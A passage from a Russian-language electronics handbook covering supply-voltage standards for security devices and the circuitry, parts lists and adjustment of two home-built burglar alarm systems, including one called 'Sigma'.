Электронные, электрические и электронно-механические изделия и устройства, составляющие большую и особую группу, к которым относятся УОС, должны отвечать определенным и строго установленным требованиям по питающему напряжению, действующей частоте переменного тока, стабилизированному току и другим параметрам. Учитывая многообразие УОС и различные условия эксплуатации, к электропитанию предъявляются повышенные требования, которые должны отвечать установленным требованиям государственных стандартов.

Для электропитания УОС в большинстве случаев применяются первичные и вторичные источники. В качестве источников первичного электропитания для УОС используются сети переменного тока напряжением 200 В частотой 50 Гц и чрезвычайно редко — напряжением 127 В. Также в качестве первичных источников применяются ХИТ: одноразовые автономные гальванические элементы типа 373, 343, 316, А373 и другие, батареи и аккумуляторы различных систем, преобразователи внутренней химической или биологической энергии вещества в электричество, термо- и фотоэлектрические преобразователи энергии, акустические, топливные, атомные и другие типы преобразователей.

В качестве вторичных источников электропитания УОС используются узлы и БП, которые работают, как правило, от первичных сетей и подключаются к ним, преобразуя их переменное или постоянное напряжение в ряд выходных напряжений различных номиналов как постоянного, так и переменного тока.

В настоящее время выпускается большое количество самых разных типов и видов первичных и вторичных источников питания, которые могут быть использованы для электропитания УОС.

Как известно, к первичным сетям электропитания относятся системы и сети, объединенные общим процессом генерирования и (или) преобразования, передачи и распределения электрической энергии и состоящие из источников и (или) преобразователей электрической энергии, электрических сетей распределительных устройств, а также устройств, обеспечивающих поддержание ее параметров в заданных пределах. Постоянное или переменное напряжение, действующее на входе электронных устройств, определяется как номинальное напряжение питания УОС.

Номинальные значения и допускаемые отклонения постоянных и переменных напряжений питания для установленных частот определены параметрическими рядами, которые распространяются как на системы электроснабжения, сети, источники, преобразователи, так и непосредственно на присоединяемые к ним приемники электрической энергии. Номинальные напряжения систем электроснабжения, источников, преобразователей, сетей и приемников приведены в табл. 1. 9. В качестве приемников электроэнергии в данном случае выступают УОС.

Таблица 1. 9. Номинальные значения напряжений питающей сети, преобразователей и приемников электрической энергии

1-51.jpg

Параметрические ряды номинальных значений токов, используемых в источниках и приемниках электрической энергии, в том числе в УОС, указаны в табл. 1. 10. Параметрические ряды номинальных частот и их допускаемые отклонения для систем электроснабжения, приемников и преобразователей электрической энергии в случае использования нетрадиционных источников переменного тока приведены в табл. 1. 11.

Таблица 1. 10. Параметрические ряды номинальных значений токов, используемых в приемниках электрической энергии

1-52.jpg

Таблица 1.11. Параметрические ряды номинальных частот и их допускаемые отклонения

1-53.jpg

Важным моментом при выборе конкретных значений номинальных напряжения и тока для УОС является правильная оценка их принципиальных электрических схем, а также схем электрооборудования ИМ и технологических процессов; цепи, замкнутые внутри изделий, в которых токи питания и напряжения определяются схемными и инженерно-техническими решениями и не вписываются в параметрические ряды, указанные в табл. 1. 10—1. 12. К ним относятся принципиальные схемы УОС с переходными процессами, токи которых определяются суммарными токами приемников электрической энергии, и их значения не могут быть обеспечены данными, приведенными в табл. 1. 10. и 1. 11. Это же положение относится к электрическим цепям, замкнутым внутри электронных схем ИМ, электрических машин, аппаратов и подобных им изделий и устройств; элементам тепловых реле; цепям приемопередающей, Сигнальной-вызывной аппаратуры, цепям измерения и контроля, сигнализации и управления; катушкам обмоток электрических аппаратов. Для УОС, а также других приемников электрической энергии, для которых предусмотрено несколько режимов работы, номинальные токи, указанные в табл. 1. 11, относятся к нормальному и установившемуся режимам работы, для остальных режимов работы

эти токи являются рекомендуемыми. Из перечисленных в табл. 1. 11 номинальных значений токов предпочтительными являются следующие: 1; 1,6;2,5;4;6,3А, а также десятинные и дольные значения этих токов.

При конструировании или применении готовых устройств электропитания для ЭУОС, отличающихся от рассматриваемых в настоящем справочнике, номинальные напряжения выбираются в основном из табл. 1. 12. В некоторых случаях, обусловленных требованиями эксплуатации УОС, используются номинальные напряжения, отличные от указанных в Табл. 1. 12. Предпочтительными номинальными напряжениями постоянного тока считаются напряжения 36 или 60 В. На входе УОС в жилых помещениях применяются однофазные переменные и фазовые напряжения трехфазного тока. Номинальное значение переменного напряжения равно 220 В. Рабочее напряжение при питании УОС от электросети общего назначения может изменяться в очень широких пределах, особенно в сельской местности,—от 150 до 280 В, а при питании радиоэлектронных изделий и электротехнической аппаратуры от электросети общего назначения через устройства регулирования — от 200 до 235 В.

Номинальное значение частоты питающей сети переменного тока, которое применяется в нашей стране, равно 50 Гц, а в США — 60 Гц. Изменения частоты питающей сети, при которых аппаратура и электронные изделия работают достаточно устойчиво, находятся в пределах от 49 до 51 Гц. Коэффициент нелинейных искажений питающей сети переменного тока лежит в пределах от 10 до 12%.

Таблица 1. 12 Параметрические ряды номинальных напряжений для питания электронных кодовых замков и УОС

1-54.jpg

Таблица 1.10. Параметрические ряды номинальных значений токов, используемых в приемниках электрической энергии

Изображение: 

Таблица 1.11. Параметрические ряды номинальных частот и их допускаемые отклонения

Изображение: 

Таблица 1.12 Параметрические ряды номинальных напряжений для питания электронных кодовых замков и УОС

Изображение: 

Таблица 1.9. Номинальные значения напряжений питающей сети, преобразователей и приемников электрической энергии

Изображение: 

3. Глава вторая. Сторожевые устройства и охранная сигнализация.

Глава вторая. Сторожевые устройства и охранная сигнализация

2. 2. Электронное устройство охранной сигнализации

2. 2 ЭЛЕКТРОННОЕ УСТРОЙСТВО ОХРАННОЙ СИГНАЛИЗАЦИИ

Рассматриваемое устройство представляет собой ЭСОС, предназначенную для охраны жилых, производственных и хозяйственных помещений, автомобилей, мотоциклов, катеров, сейфов и других ценных объектов и предметов циклического пользования.

Устройство может быть установлено в квартирах жилых домов, производственных зданиях малых предприятий, кооперативах и акционерных обществах, хозяйственных постройках на садово-огородных участках, гаражах и т. д.

ЭСОС создана как комплексное электронно-техническое устройство, обеспечивающее автоматическое срабатывание сигнальных цепей и блоков при несанкционированном вторжении в охраняемый объект и при нарушении звеньев системы охраны. Относительная простота и надежность работы СОС делают ее доступной для повторения в радиолюбительских мастерских и кружках юных техников.

Принципиальная электрическая схема комбинированной ЭСОС приведена на рис. 2. 1. Как следует из принципиальной схемы, ЭУОС состоит из следующих функциональных блоков и узлов: входных цепей, сетевого понижающего трансформатора питания 77, выпрямителя, автономного источника питания GB1, СНПТ, электронного блока управления, выходных цепей, сигнализатора и индикатора. В качестве автономного источника питания может быть использована аккумуляторная батарея GB1 любого типа, обеспечивающая на выходе напряжение 12 В. Входное устройство обеспечивает подключение ЭСОС к сети переменного тока напряжением 220 В частотой 50 Гц с помощью электрического соединителя X1 типа «вилка» и стандартной штепсельной розетки. Плавкий предохранитель F1, установленный на входе устройства, защищает его от коротких замыканий, которые возможны при неправильном монтаже, ошибках при сборке и из-за неисправных комплектующих ЭРЭ. Включение и выключение питания обеспечивается однополюсным переключателем S1, при замыкании контактов которого переменное напряжение подается на первичную обмотку трансформатора Т1. При включении устройства в сеть загорается индикаторная неоновая лампа H1, которую устанавливают на видном месте охраняемого объекта.

Блок выпрямительного устройства включает в свой состав сетевой понижающий трансформатор питания T1 и собственно выпрямитель, собранный по однофазной двухполупериодной мостовой схеме Греца на четырех выпрямительных диодах VD1 — VD4. Примененное выпрямительное устройство характеризуется достаточно полным использованием габаритной мощности сетевого трансформатора, повышенной частотой пульсации выпрямленного напряжения постоянного тока, повышенным кпд устройства, низким обратным напряжением на комплекте выпрямительных диодов, повышенным сроком эксплуатации, но несколько большей стоимостью изготовления. Диоды выпрямителя должны быть установлены на гетинаксовой плате с распайкой катодов и анодов по схеме, их нельзя установить на общей металлической пластине вместе с сетевым трансформатором без прокладок. Повышенный расход выпрямительных диодов, по сравнению с другими выпрямительными схемами, компенсируется высокой надежностью и долговечностью работы устройства.

Сетевой понижающий трансформатор питания 77 изготавливается на броневом магнитопроводе типа Ш, имеет одну катушку, которая устанавливается на центральном стержне магнитопровода, имеющем активную площадь поперечного сечения стали не менее 7 см2. Кроме основной функции сетевой трансформатор обеспечивает гальваническую развязку вторичных цепей устройства от сети переменного тока высокого напряжения и дополнительную электробезопасность при эксплуатации ЭСОС. При изготовлении сетевого трансформатора в домашних условиях необходимо обратить особое внимание на изоляцию обмоточных проводов между слоями и между обмотками, а также обязательную пропитку трансформатора изоляционными лаками. Магнитопровод трансформатора изготавливается методом шихтовки из пластин трансформаторной стали толщиной 0, 25... 0, 5 мм.

Первичная обмотка трансформатора рассчитана на подключение к сети переменного тока напряжением 220 В и выдерживает максимальную токовую нагрузку до 3 А. На вторичной обмотке трансформатора действует напряжение переменного тока равное 32, 5 В в режиме холостого хода.

Напряжение постоянного тока, снимаемое с полупроводникового выпрямителя, подается на источник стабилизированного напряжения, который представляет собой регулируемый компенсационный стабилизатор последовательного действия. Его выходное напряжение можно плавно регулировать в пределах 5... 30 В при токе нагрузки до 1 А. СИП включает в свой состав РЭ, собранный на тиристоре VD6 (VS1), работающем в ключевом режиме, благодаря чему потери мощности в стабилизаторе очень малы и рассеиваемая тепловая энергия незначительна. Тиристор управляется импульсами, вырабатываемыми релаксационным генератором, собранным на аналоге однопереходного составного транзистора VT2, VT3. Напряжение на выходе стабилизатора определяется разностью фаз импульсов управляющего генератора и полуволн выпрямленного напряжения. Эта разность напряжений зависит от зарядного тока конденсатора С3, который включен в коллекторную цепь транзистора VT1, выполняющего функцию регулятора постоянного тока. На базу транзистора с движка подстроечного резистора R3 поступает часть напряжения со стабилитрона VD5, а на эмиттер — часть выходного напряжения, снимаемого с делителя R9, R10. Подстроечным резистором R3 устанавливается требуемое напряжение питания в пределах от 5 до 30 В.

При уменьшении значения выходного напряжения стабилизатора относительно установленного уровня напряжение на резисторе R9 также уменьшается, а на эмиттерном переходе транзистора VT1 увеличивается открывающее напряжение. В результате его коллекторный ток увеличивается, а конденсатор СЗ начинает заряжаться быстрее. Это приводит к более раннему открыванию тринистора VD6 (VSI), поэтому напряжение на выходе стабилизатора возрастает до прежнего значения. Если же выходное напряжение увеличивается, процесс восстановления заданного уровня напряжения протекает в обратном направлении. Напряжение, снимаемое с транс форматора, обеспечивается коэффициентом трансформации и моточными данными, которые приведены и табл. 2. 3.

Электронный управляющий блок ЭСОС является основным устройством, которое представляет собой обычную триггерную схему, собранную на двух ИМС DAI и DA2, пяти транзисторах и шести выпрямительных диодах. В принципиальной схеме управляющего блока ЭСОС собрано устройство против ложных срабатываний. Сигнальная цепь как главная часть электронной системы представляет собой определенный набор микропереключателей и электрических датчиков, которые устанавливаются замаскированно на окнах, дверях, замках, задвижках, переключателях, калитках и т. п.

В составе электронного управляющего блока собрано два таймера, обеспечивающих задержку срабатывания охранной системы после размыкания любого микропереключателя и электрического датчика. Первый таймер обеспечивает короткую временную задержку срабатывания ЭСОС, которая достаточна для установления системы в исходное положение, то есть до того, как она будет приведена в действие, когда владелец войдет в охраняемый объект или помещение, разомкнув один из микропереключателей, например на входной двери. Второй таймер настраивается на определенно заданное время работы звукового или светового сигнализаторов. Принципиальная схема предусматривает возможность устанавливать время работы сигнальной системы от 0 до 5 мин после срабатывания. По истечении заданного времени работы система автоматически отключается и устанавливается в исходное положение независимо от того, замкнута или разомкнута сигнальная цепь устройства. Первый таймер можно настроить на задержку времени срабатывания до 30... 35 с.

Работоспособность сигнальной системы восстанавливается в любой момент рабочего цикла специальной кнопкой переключателя S2 типа П2К. При замкнутой сигнальной цепи во включенном состоянии постоянно течет ток, обеспечивающий запуск управляющего устройства. В это время таймеры отключены и не работают. При размыкании сигнальной цепи открывается транзи-

Т а б л и ц а 2. 3. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве охранной сигнализации

2-21.jpg

стор VT10 на время, устанавливаемое зарядкой конденсатора С8 и сопротивлением резистора R27, в результате чего конденсатор С7 разряжается и первый таймер приводится в действие. Резистор R1 и конденсатор С1 предотвращают срабатывание первого таймера от случайных сигналов, возникающих в сигнальной цепи. В случае многократного размыкания и замыкания контактов микропереключателей в сигнальной цепи первый таймер, не завершив свой цикл, не даст команды на включение второго таймера. Для устранения этого недостатка первая ИМС соединена со второй. После того как первый таймер завершит свой цикл, открывается транзистор VT2 и начинает заряжаться конденсатор С10, запускающий второй таймер.

Обе ИМС DA1 и DA2 питаются постоянным стабилизированным напряжением, не превышающим 12... 15 В. Для получения этого напряжения применен биполярный транзистор VT9, который совместно со стабилитроном VD11 и резистором R15 обеспечивает заданное значение напряжения. В схеме использованы транзисторы VT7 и VT8, преобразующие напряжение выходного сигнала второго таймера до значения напряжения на выходе компенсационного стабилизатора. А транзисторы VT4 и VT5 обеспечивают усиление мощности, достаточное для срабатывания электромагнитного реле.

В данной ЭСОС используются широко применяемые комплектующие ЭРИ, которые имеются в продаже. Комплектующие ЭРЭ собираются на печатной плате, изготавливаемой из фольгированного гетинакса или стеклотекстолита толщиной до 2 мм. Печатная плата, сетевой трансформатор питания Т1 и аккумуляторная батарея располагаются на шасси из дюралюминия и закрепляются в пластмассовом или металлическом корпусе, имеющем крышку и лицевую панель.

При создании сторожевого устройства применены следующие комплектующие ЭРЭ и ЭРИ: сетевой понижающий трансформатор питании Т1 типа Ш броневой конструкции; ИМС DA1 типа К561ЛА7, DA2 типа К561ЛА7; транзисторы VTI типа МП 114, VT2 — МП114, VT3 - КТ315Г, VT4 — КТ933Б VT5-КТ3102Д, VT6 — КТ3102Д, VT7 — КТ3107Б, VT8 — КТ3102Д VT9 — КТ3102Д, VT10 — КТ3102Д; выпрямительные диоды VD1 — VD4 типа КД202Б, VD7 — КД521А, VD8 — КД521А VD9 - КД223, VD12 - VD15 типа КД521А; тиристор VD6 (VS1) типа КУ201Г; стабилитроны VD5 типа Д814В, VD11— Д814А; светодиод VD10 (HL1) типа АЛ307Б; конденсаторы С1 типа K50-16-16U-22 мкф, С2 — К50-3-50В-10 мкФ, СЗ — К40У-9-0,33 мкФ, С4 — К50-3-50В-2000 мкФ, С5 — К10-7В-50В-1 мкФ С6 — К10-17-40В-Н90-1 мкФ, С7 — К10-17-40В-Н90-1 мкФ С8 — К10-17-40В-Н90-0.1 мкФ, С9 — КМ-6-25В-НЗО-0 1 мкФ С10 — КМ-6-25В-Н90-1 мкФ, СИ — К50-3-25В-10 мкФ; резисторы R1 типа ВСа-0,5-5,6 кОм, R2 — ВСа-0,5-2 кОм, R3 — переменный типа СП3-1б-0,25Вт-6,8 кОм, R4 — ВСа-2-6,2 кОм R5 — ВСа-0,5-6,2 кОм, R6 — ВСа-0,25-10 кОм, R7 — ВСа-025-10 кОм, R8 - ВСа-0,25-10 кОм, R9 — ВСа-0,25-1,5 кОм R10 — ВСа-0,25-4,7 кОм, R11 — ВСа-0,25-1,8 кОм, R12 — ВСа-025-10 кОм, R13 — ВСа-0,25-22 кОм, R14 — ВСа-1-22 кОм R15 — ВСа-0,25-2,2 кОм, R16 - ВСа-0,25-22 кОм, R17 — ВСа-025 10 МОм, R18 — ВСа-0,25-10 МОм, R19 — ВСа-0,25-330 кОм R20 — ВСа-0,25-330 кОм, R21 — ВСа-0,25-2,2 МОм, R22 — ВСа-0,25-10 кОм, R23 — ВСа-0,25-1 МОм, R24 — ВСа-0,25-10 кОм R25 — ВСа-0,25-10 кОм, R26 — ВСа-1-22 кОм, R27 — ВСа-2-10 кОм, R28 — ВСа-2-280 кОм; реле электромагнитное К1 типа РЭС-10; предохранитель плавкий F1 типа ПМ-1-0,5 А; индикаторная лампа Н1 типа ТН-0,2-1; переключатели S1 типа П1Т-1-1, S2 — KПI-1, S3 — Sn типа МП-7; электрический соединитель X1 типа «вилка» с электрическим кабелем длиной 1,5 м; Х2, ХЗ — КМЗ-1; громкоговоритель(сирена) ВА1 типа 0,5 ГД1.

При монтаже, регулировке, настройке и ремонте сторожевого устройства могут быть применены другие комплектующие ЭРЭ, не ухудшающие основные электрические параметры и эксплуатационные характеристики ЭСОС. Например, сетевой понижающий трансформатор питания Т1 может быть заменен трансформатором унифицированной конструкции типов ТА, ТН, ТАН, ТПП, ТС, ТТ; резисторы типа ВСа могут быть заменены резисторами типов МЛТ, ОМЛТ, C1-4, С2-8, МТ, УЛИ. Замена ППП может быть произведена в соответствии с рекомендациями, изложенными выше. В качестве оксидных или электролитических конденсаторов могут быть применены конденсаторы типов К50-3, К50-12, К50-16, К50-20.

Нормированные значения климатических и механических внешних воздействующих факторов, условия эксплуатации данного электронного устройства и его основные электрические параметры рассмотрены ниже.

Здесь необходимо сказать об установке ИМС на платы, лужение выводов и пайка которых производятся с учетом конструктивных особенностей корпусов ИМС.

При установке примененных в сторожевом устройстве ИМС необходимо принять все меры предосторожности, которые должны сводиться к тому, чтобы защитить корпус ИМС от недопустимых деформаций. Чаще всего это. достигается правильной распайкой выводов на заранее подготовленные контактные площадки. Размещение корпусов на печатной плате должно обеспечивать возможность свободного доступа для ее демонтажа.

Специальные требования предъявляются к правильному выбору режимов пайки выводов, которые изложены в табл. 2. 4. Качество паяных соединений ИМС не зависит от количества припоя и флюса, скорее наоборот: излишки припоя могут скрыть дефекты соединения, а обилие канифоли или флюса приводит к загрязнению места пайки.

Надежное и правильно выполненное паяное соединение характеризуется следующими признаками, которые определяются визуально: паяная поверхность должна быть светлой блестящей или светло-матовой, без темных пятен и посторонних включений, форма паяных соединений должна иметь вогнутые галтели припоя. Через припой должны проявляться контуры входящих в соединение выводов элементов и проводников. Работа с ИМС кроме всего требует специальных мер защиты от повреждений статическим электричеством.

Таблица 2. 4. Режимы пайки выводов микросхем

2-22.jpg

ЭУОС работает в полуавтоматическом режиме следующим образом. При включенном ЭУОС в сеть переменного тока при наличии автономного источника питания и при замкнутых контактах переключателей S1 и S1.1 оно находится в режиме ожидания. При этом все последовательно соединенные контакты переключателей S3... Sn замкнуты. В это время на выходе ИМС DA2 действует высокий уровень — состояние логической единицы, такой же высокий уровень действует на обоих входах ИМС DA1.

При размыкании одного из контактов переключателей S3... Sn вход ИМС DA 1 (вывод 13) переходит в состояние низкого уровня логического нуля, а выход этой ИМС (вывод 12} — в состояние высокого уровня логической единицы. Включенные в цепь резистор R1 и конденсатор С1 защищают управляющее устройство от электромагнитных наводок, которые могут возникнуть в сигнальных цепях. В то время, когда вход ИМС DA1 (вывод 13) находится в состоянии низкого уровня логического нуля, а выход (вывод 12) — в состоянии высокого уровня логической единицы, открывается транзистор VT10, в результате чего конденсатор С7 разряжается и первый таймер приходит в действие.

Важно заметить, что таймером называется прибор (устройство), который по истечении заданного промежутка времени может автоматически включать (выключать) ИМ. Время открывания транзистора VT10 определяется емкостью конденсатора С8, а также сопротивлением резистора R27. Для запуска второго таймера вход первой ИМС DA I (вывод 14) подключен к выходу второй ИМС DA2 (вывод 12). Этот выход (вывод 12} находится в состоянии низкого уровня логического нуля до тех нор, пока работает первый таймер. После срабатывания первого таймера выход ИМС DA2 (вывод 12) переходит в состояние высокого уровня логической единицы, транзистор VT6 открывается, конденсатор С10 заряжается и запускается второй таймер. Для установления обоих таймеров в исходное состояние в ЭУОС установлен переключатель S2, нажатие на кнопку которого и замыкание контактов 1 и 2 приводят к быстрой разрядке конденсаторов С7 и С10 через диоды VD7 и VD8.

Электронное устройство работает от источника постоянного тока напряжением до 25 В. Однако ИМС могут работать при напряжении не более 15 В, а оптимальным напряжением в данном случае выбрано напряжение 7, 5 В. При выборе исполнительного устройства — сигнальной сирены — необходимо учитывать, что на него подается напряжение постоянного тока также 25 В.

Преобразование повышенного напряжения питания до значения 7, 5 В осуществляется с помощью включенных в схему транзистора VT9, стабилитрона VD11 и резистора R15, а также транзисторов VT7 и VT8. Четыре биполярных транзистора VT4 и VT5, VT7 и VT8 обеспечивают соответственно усиление по мощности, необходимое для срабатывания электромагнитного реле К1 и исполнительных устройств, они обеспечивают преобразование выходного сигнала второго таймера с 7, 5 В до значения напряжения источника питания исполнительных механизмов.

Параллельно сетевому источнику питания, работающему от выпрямителя на диодах VD1 — VD4, в схему включен автономный источник электропитания (ХИТ), напряжение которого находится в пределах 12... 20 В. Действует автономный источник питания при отключении электропитания от сети переменного тока, а также при разомкнутых контактах переключателя S1 так, как показано на схеме. Контакты переключателя S1. 1 при этом должны быть замкнуты. Электропитание ЭУОС от автономного источника питания GB1 осуществляется через выпрямительный диод VD16, который закрыт в одном направлении до тех пор, пока напряжение на выпрямителе выше напряжения батареи аккумуляторов. Поэтому оптимальным напряжением электропитания считается напряжение 15 В.

Регулировку ЭУОС начинают с проверки напряжения на вторичных обмотках сетевого понижающего трансформатора Т1, далее — на выходе выпрямителя Греца и на выходе стабилизатора компенсационного типа. Проверка ЭУОС в целом не представляет особой сложности. Необходимо проверить наличие напряжения на конденсаторе С4. Если напряжение на конденсаторе отсутствует, то надо проверить работоспособность стабилитрона VD11. Электромагнитное реле К1 позволяет запускать электронную схему и подавать напряжение на сирену ВА1 без перенапряжения конденсатора С4, не увеличивая его номинальную емкость. Напряжение на светоизлучающий диод подается через регулирующий переменный резистор R11.

Основные электрические параметры и технические характеристики электронного устройства охранной сигнализации

Номинальное напряжение питающей сети

переменного тока, В.................... 220

Номинальная частота питающей сети переменного тока, Гц......................... 50

Номинальное напряжение питания постоянного

тока от автономного источника, В........... 12... 15

Пределы изменения напряжения питающей сети

переменного тока, В.................... 187... 242

Пределы изменения частоты питающей сети переменного тока, %, не более.............. + _1

Пределы регулирования выходного стабилизированного напряжения, В................. 5... 30

Мощность СИП, Вт, не менее............... 50

Мощность, потребляемая устройством в режиме

холостого хода, Вт, не более............... 5

Коэффициент стабилизации напряжения постоянною тока, не менее..................... 150

Коэффициент нелинейных искажений питающей

сети переменного тока, %, не более......... 10

Количество одновременно охраняемых помещений

и объектов, шт........................ 1... 20

Готовность устройства к эксплуатации после

включения в рабочий режим, с............. 0, 5

Время срабатывания ЭУОС после размыкания контактов одного из переключателей охранной цепи, мс, не более....................3

вероятность безотказной работы устройства при риске заказчика в=0, 93............. 0, 97

Срок службы устройства, ч, не менее...... 5000

Электрическая прочность изоляции токоведущих цепей при нормальных климатических условиях эксплуатации, В, не менее................ 500

Электрическое сопротивление изоляции токоведущих частей между собой и металлическим корпусом, МОм, не менее................ 10

Помехозащищенность устройства при напряженности внешнего электромагнитного поля, дБ, не менее............................ 80 кпд, %, не менее........................ 70

t11.jpg

Рис. 2.1. Принципиальная схема комбинированной электронной системы охранной сигнализации.

Рис. 2.1. Принципиальная схема комбинированной электронной системы охранной сигнализации.

Изображение: 

Таблица 2.3. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном устройстве охранной сигн

Изображение: 

Таблица 2.4. Режимы пайки выводов микросхем

Изображение: 

2. 3. Устройство сигнализации типа «Сигма»

2. 3. УСТРОЙСТВО СИГНАЛИЗАЦИИ ТИПА «СИГМА»

Это электронное УС широко используется в виде БЭ в различных промышленных охранных устройствах, рекламируемых разными фирмами и акционерными обществами. Как правило, в охранных и предупредительных устройствах, устанавливаемых на объектах, этот БЭ не раскрывается и не сопровождается принципиальной электрической схемой. А отсутствие информации о применяемых комплектующих ЭРЭ не позволяет владельцам охранных устройств устранять неполадки в схеме своими силами.

Электронное УС типа «Сигма», работающее по принципу включения на замыкание контактов конечных выключателей, предназначено для охраны жилых и производственных помещений, хозяйственных построек на садово-огородных участках, а также автомобилей, мотоциклов, катеров и т. п. Срабатывает устройство при несанкционированном открывании дверей, окон, форточек, крышек, капотов и т. п., замыкая контакты переключателей. Работает УС или от сети переменного тока напряжением 220 В частотой 50 Гц, или от аккумуляторной батареи напряжением от 9 до 12 В постоянного тока. Аккумуляторная батарея отключается при эксплуатации УС от сети переменного тока. При установке УС в автомобиле, катере или яхте электропитание осуществляется от бортовой сети.

Принципиальная электрическая схема УС со звуковой сигнализацией типа «Сигма» приведена на рис. 2. 2. УС включает в свой состав цепи входного устройства, сетевой понижающий трансформатор питания Т1, выпрямительное устройство с емкостным фильтром, стабилизатор напряжения компенсационного тина, сигнальную систему управления со схемой электронной сирены.

Входное устройство УС. обеспечивает подключение к сети переменного тока напряжением 220 В, защиту исходных цепей от коротких замыканий и перегрузок, которые могут возникнуть при ошибках в монтаже или из-за неисправных комплектующих элементов, сигнализацию о готовности УС к эксплуатации и подключение аварийного питания от аккумуляторной батареи GBI с контролем тока нагрузки, включение и выключение электропитания УС осуществляется с помощью двух переключателей S1 (от автономного источника питания) и S2 (от сети переменного тока).

В устройстве применен сетевой понижающий трансформатор питания Т1, который изготавливается на унифицированном магнитопроводе типа УШ броневой конструкции и имеет одну катушку, устанавливаемую на центральном стержне. Активная площадь поперечного сечения стали магнитопровода должна быть не менее 4 см2.

При изготовлении самодельного трансформатора в домашней мастерской следует обратить особое внимание на качество изоляции между слоями обмоточных проводов и между обмотками. Особенно тщательно надо изолировать экранную обмотку как от первичной, так и от вторичных обмоток. Вместо самодельного трансформатора питания в устройстве может быть использован унифицированный серии «Габарит», например трансформатор, имеющий повышенную степень надежности и долговечности типа ТПП 287-127/220-50, что крайне необходимо при длительной, иногда круглосуточной работе системы в ждущем режиме. Кроме этого сетевой понижающий трансформатор 77 обеспечивает заданные значения выпрямленного напряжения постоянного тока, гальваническую развязку вторичных цепей УС от высокого напряжения сети переменного тока, а также дополнительную электробезопасность при эксплуатации. На вторичных обмотках сетевого трансформатора действуют напряжения 5 и 15 В.

Выпрямитель УС собран по однофазной двухполупериодной мостовой схеме Греца на четырех выпрямительных диодах средней мощности VD2 — VD5. Выбор схемы этого выпрямителя обусловлен тем, что она обеспечивает повышенную частоту пульсации выпрямленного напряжения постоянного тока на выходе выпрямителя, низкое значение обратного напряжения на комплекте диодов, полное использование габаритной мощности сетевого трансформатора, оптимальный уровень кпд, возможность подключения выпрямителя к сети переменного тока без понижающего трансформатора. Но по сравнению с другими выпрямителями рассматриваемая схема имеет повышенную стоимость изготовления и невозможность установки выпрямительных диодов на радиаторы охлаждения без изоляционных прокладок. Выпрямитель УС работает на емкостный фильтр, собранный на конденсаторе С1, который сглаживает пульсации выпрямленного напряжения постоянного тока. На выходе выпрямительного устройства собран также индикатор перегрузки, в состав которого входят индикаторная лампа Н2 и проволочный резистор R1.

Выпрямленное и сглаженное фильтром напряжение постоянного тока подается на компенсационный стабилизатор напряжения последовательного действия, собранный на транзисторах VT1, VT2 и стабилитроне VD6. Резистор R3 позволяет плавно регулировать выходное напряжение на стабилизаторе в пределах от 2 до 12 В. Ток нагрузки при постоянном выходном напряжении обеспечивается в пределах от 250 до 300 мА. Регулирующим элементом в стабилизаторе напряжения является транзистор VT2, управляющим элементом — VT1, который включен как эмиттерный повторитель.

Электрическая цепочка, составленная из стабилитрона VD6 и резистора R2, стабилизирует напряжение на резисторе R4. Устройство сигнализации, являющееся нагрузкой, включено в эмиттерную цепь транзистора VT2, и потребляемый им ток течет через участок эмиттер — коллектор этого транзистора. В случае перегрузки или короткого замыкания в цепи электронной сирены ток возрастает, увеличивая падение напряжения на индикаторной лампе Н2 и резисторе R1. Сопротивление резистора R1 рассчитано таким образом, что при токе нагрузки до 200... 300 мА нить накала лампы Н2 начинает накаливаться, а при токе более 300 мА — ярко светиться. Конденсатор СЗ дополнительно сглаживает пульсации выпрямленного напряжения и является вторым емкостным фильтром. Резистор R5 установлен для того, чтобы и при отключенном устройстве охраны регулирующий транзистор работал бы как усилитель тока.

Собственно электронное УС включает в свой состав два таймера, собранных на ИМС DA1 и DA2, которые включены по схеме генераторов автоколебаний. Первый таймер работает на частоте примерно 3 Гц. Второй таймер-генератор работает на частоте до 1 кГц. ИМС DA2 вырабатывает выходные сигналы двух типов. С первого выхода ИМС ДА2 (вывод 3} снимается сигнал прямоугольной формы, а с двух других выходов (выводы 2 и б) — сигналы пилообразной формы, которые обеспечивают частотную модуляцию звукового сигнала на выходе УС.

Составной транзистор, образованный двумя транзисторами VT7 и VT8, а также резистор R14 обеспечивают заранее заданное и необходимое напряжение на конденсаторе Сб.

Выходной сигнал второго генератора, собранного на ИМС DA1, обеспечивается в виде последовательных импульсов длительностью от 90 до 100 мкс. Уровень и частота звукового сигнала на выходе можно изменять путем регулирования питающего напряжения. Пониженное напряжение дает возможность получить более высокий тон звучания.

Микропереключатели S3 — S6 устанавливаются скрытно на окнах, дверях, крышках, капотах охраняемых объектов, они должны включаться и замыкать сигнальную цепь независимо от их расположения на объектах. Все микропереключатели соединяются параллельно друг другу, что приводит к срабатыванию СОС при замыкании любого переключателя.

Изменение сопротивления резистора R15 дает возможность управлять частотой модуляции выходных сигналов, а изменение сопротивления резистора R12 позволяет управлять высотой тона звучания сирены. Значение сопротивления резистора R11 влияет на глубину модуляции сигнала. Транзистор VT5, стабилитрон VD7 резистор R6 обеспечивают установку необходимого питающего напряжения ИМС. С первого выхода ИМС DA2 (вывод 3) снимается напряжение в виде отрицательных импульсов, которое поступает на транзистор VT6, инвертируется и поступает на вход составного транзистора, собранного на VT3 и VT4. Этот составной транзистор обеспечивает усиление по мощности, необходимое для включения громкоговорителя ВА1 (или автомобильной сирены) при высоком уровне звукового сигнала. Все основные детали и комплектующие изделия УС типа «Сигма» смонтированы на плате, выполненной под печатный монтаж и изготовленной из фольгированного стеклотекстолита или гетинакса толщиной до 2 мм. Токонесущие проводники и контактные площадки на печатной плате выполнены прорезями в фольге и имеют ширину не менее 1,5 мм. Печатная плата с помощью четырех винтов с гайками и монтажных стоек высотой до 25 мм закрепляется на шасси в пластмассовом корпусе, который имеет крышку с вентиляционными отверстиями и лицевую панель. На этой панели монтируются выключатель питания S1, держатель сетевого плавкого предохранителя FI, сигнальные лампы H1 и Н2, ручки управления переменных резисторов и стрелочный ИП.

На боковую стенку корпуса выведены приборные малогабаритные контактные зажимы, переключатель S1 и сетевой шнур с электрическим соединителем X1.

